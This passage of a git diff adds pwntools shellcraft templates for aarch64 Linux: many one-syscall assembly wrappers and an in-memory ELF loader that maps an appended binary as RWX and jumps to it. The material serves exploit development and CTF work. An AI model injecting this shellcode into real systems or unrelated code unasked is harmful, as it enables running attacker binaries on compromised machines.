fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm b/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm new file mode 100644 index 000000000..15f84a708 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm new file mode 100644 index 000000000..84e1b384d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm new file mode 100644 index 000000000..331158ed2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm b/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm new file mode 100644 index 000000000..f9a15b1a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm b/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm new file mode 100644 index 000000000..574769dc6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm new file mode 100644 index 000000000..5351f2e8a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm new file mode 100644 index 000000000..1cb71111f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm new file mode 100644 index 000000000..c77c49396 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm b/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm new file mode 100644 index 000000000..0c8d95109 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm b/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm new file mode 100644 index 000000000..e4cabd8f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm new file mode 100644 index 000000000..2624bddf4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm new file mode 100644 index 000000000..f0ecf8b11 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm new file mode 100644 index 000000000..c34220c28 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm new file mode 100644 index 000000000..6795b50f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm new file mode 100644 index 000000000..67932f4d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm new file mode 100644 index 000000000..05d246d76 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm b/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm new file mode 100644 index 000000000..58942410a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm new file mode 100644 index 000000000..c61465875 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm new file mode 100644 index 000000000..f109bb1d9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm new file mode 100644 index 000000000..ee76fe8cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm b/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm new file mode 100644 index 000000000..ebb92d592 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm new file mode 100644 index 000000000..9239324aa --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm new file mode 100644 index 000000000..9fa37a55b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm b/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm new file mode 100644 index 000000000..a24a2a713 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm new file mode 100644 index 000000000..d28c4baaf --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm new file mode 100644 index 000000000..e9af2f109 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm b/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm new file mode 100644 index 000000000..ceac69f42 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm new file mode 100644 index 000000000..1660852c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm b/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm new file mode 100644 index 000000000..90d0d926b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm b/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm new file mode 100644 index 000000000..45184f0fe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/kill.asm b/pwnlib/shellcraft/templates/aarch64/linux/kill.asm new file mode 100644 index 000000000..c06e63889 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm b/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm new file mode 100644 index 000000000..6d3c02328 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/link.asm b/pwnlib/shellcraft/templates/aarch64/linux/link.asm new file mode 100644 index 000000000..0856abd09 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm new file mode 100644 index 000000000..0b07a98ee --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/listen.asm b/pwnlib/shellcraft/templates/aarch64/linux/listen.asm new file mode 100644 index 000000000..3b076df13 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/loader.asm b/pwnlib/shellcraft/templates/aarch64/linux/loader.asm new file mode 100644 index 000000000..495b4b6bb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/loader.asm @@ -0,0 +1,183 @@ +<% + from pwnlib.shellcraft.aarch64.linux import exit as exit + from pwnlib.shellcraft.aarch64.linux import mmap + from pwnlib.shellcraft.aarch64 import setregs, mov, memcpy + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +<% +elf_magic = unpack('\x7fELF', 32) +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') + +""" +Elf64_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf64_Half + +0x0012 e_machine : Elf64_Half + +0x0014 e_version : Elf64_Word + +0x0018 e_entry : Elf64_Addr + +0x0020 e_phoff : Elf64_Off + +0x0028 e_shoff : Elf64_Off + +0x0030 e_flags : Elf64_Word + +0x0034 e_ehsize : Elf64_Half + +0x0036 e_phentsize : Elf64_Half + +0x0038 e_phnum : Elf64_Half + +0x003a e_shentsize : Elf64_Half + +0x003c e_shnum : Elf64_Half + +0x003e e_shstrndx : Elf64_Half + +Elf64_Phdr + +0x0000 p_type : Elf64_Word + +0x0004 p_flags : Elf64_Word + +0x0008 p_offset : Elf64_Off + +0x0010 p_vaddr : Elf64_Addr + +0x0018 p_paddr : Elf64_Addr + +0x0020 p_filesz : Elf64_Xword + +0x0028 p_memsz : Elf64_Xword + +0x0030 p_align : Elf64_Xword +""" +e_entry = 0x0018 +e_phoff = 0x0020 +e_phnum = 0x0038 +e_phentsize = 0x0036 +p_type = 0x0000 +p_offset = 0x0008 +p_vaddr = 0x0010 +p_filesz = 0x0020 +p_memsz = 0x0028 + +PT_LOAD = 1 +%> + + ${setregs({'x0': address})} + + /* Check the ELF header */ + ldr x1, [x0] + ${mov('x2', elf_magic)} + cmp w1, w2 + bne ${die} + + /* Discover program headers */ + add x1, x0, #${e_phoff} + ldr x1, [x1] + add x1, x1, x0 /* x1 = &program headers */ + + add x2, x0, #${e_phentsize} + ldrh w2, [x2] /* x2 = program header size */ + + add x3, x0, #${e_phnum} + ldrh w3, [x3] /* x3 = number of program headers */ + +1: + /* For each section header, mmap it to the desired address */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! + bl ${load_one} + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + + add x1, x1, x2 + subs x3, x3, #1 + bne 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + add x1, x0, #${e_entry} + ldr x1, [x1] + mov x8, x1 + + /* Set up the fake stack. + For whatever reason, aarch64 binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor x0, x0, x0 + eor x1, x1, x1 + stp x0, x1, [sp, #-16]! + /* AT_RANDOM */ + mov x2, #25 + mov x3, sp + stp x2, x3, [sp, #-16]! + + /* argc, argv[0], argv[1], envp */ + /* ideally these could all be empty, but unfortunately + we have to keep the stack aligned. it's easier to + just push an extra argument than care... */ + stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ + mov x0, 1 + mov x1, sp + stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + + br x8 + +${load_one}: + /* x1 = &program headers */ + stp x29, x30, [sp, #-16]! + mov x29, sp + + /* If it's not a PT_LOAD header, don't care */ + add x2, x1, #${p_type} + ldr x2, [x2] + uxth w2, w2 /* zero-extend halfword */ + cmp x2, #${PT_LOAD} + bne ${next_phdr} + + /* Get the destination address into x2 */ + add x2, x1, ${p_vaddr} + ldr x2, [x2] + + /* Get the size to mmap into x3 */ + add x3, x1, #${p_memsz} + ldr x3, [x3] + lsr w3, w3, #12 + add x3, x3, #1 + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + lsl w3, w3, #12 + 4 + + /* Map the page in */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! + lsr w2, w2, #12 + lsl w2, w2, #12 + ${mmap('x2', 'x3', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + + /* Get the source address into x4 */ + add x4, x1, #${p_offset} + ldr x4, [x4] + add x4, x4, x0 + + /* Get the number of bytes into x5 */ + add x5, x1, #${p_filesz} + ldr x5, [x5] + + /* Copy the data */ + stp x0, x1, [sp, #-16]! + stp x2, x3, [sp, #-16]! + stp x4, x5, [sp, #-16]! + ${memcpy('x2','x4','x5')} + ldp x4, x5, [sp], #16 + ldp x2, x3, [sp], #16 + ldp x0, x1, [sp], #16 + +${next_phdr}: + mov sp, x29 + ldp x29, x30, [sp], #16 + ret x30 + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm b/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm new file mode 100644 index 000000000..d9db10a99 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/loader_append.asm @@ -0,0 +1,54 @@ +<% + from pwnlib.shellcraft.aarch64.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> gcc = process(['aarch64-linux-gnu-gcc','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + # >>> gcc.write(''' + # ... int main() { + # ... printf("Hello, %s!\\n", "world"); + # ... } + # ... ''') + # >>> gcc.shutdown('send') + # >>> gcc.poll(True) + # 0 + # >>> sc = shellcraft.loader_append('a.out') + # >>> run_assembly(sc).recvline() + # 'Hello, world!\n' + + +<%page args="data = None"/> +<% +there = common.label('there') +here = common.label('here') +%> + b ${there} +${here}: + mov x0, x30 /* lr */ + ${loader('x0')} +${there}: + bl ${here} +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm b/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm new file mode 100644 index 000000000..a41cf237b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm b/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm new file mode 100644 index 000000000..e11062bf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm new file mode 100644 index 000000000..2c9cc87fd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm b/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm new file mode 100644 index 000000000..aeb4e66c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm b/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm new file mode 100644 index 000000000..442ec81e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm new file mode 100644 index 000000000..3b8190bab --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm b/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm new file mode 100644 index 000000000..dd00c58f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from 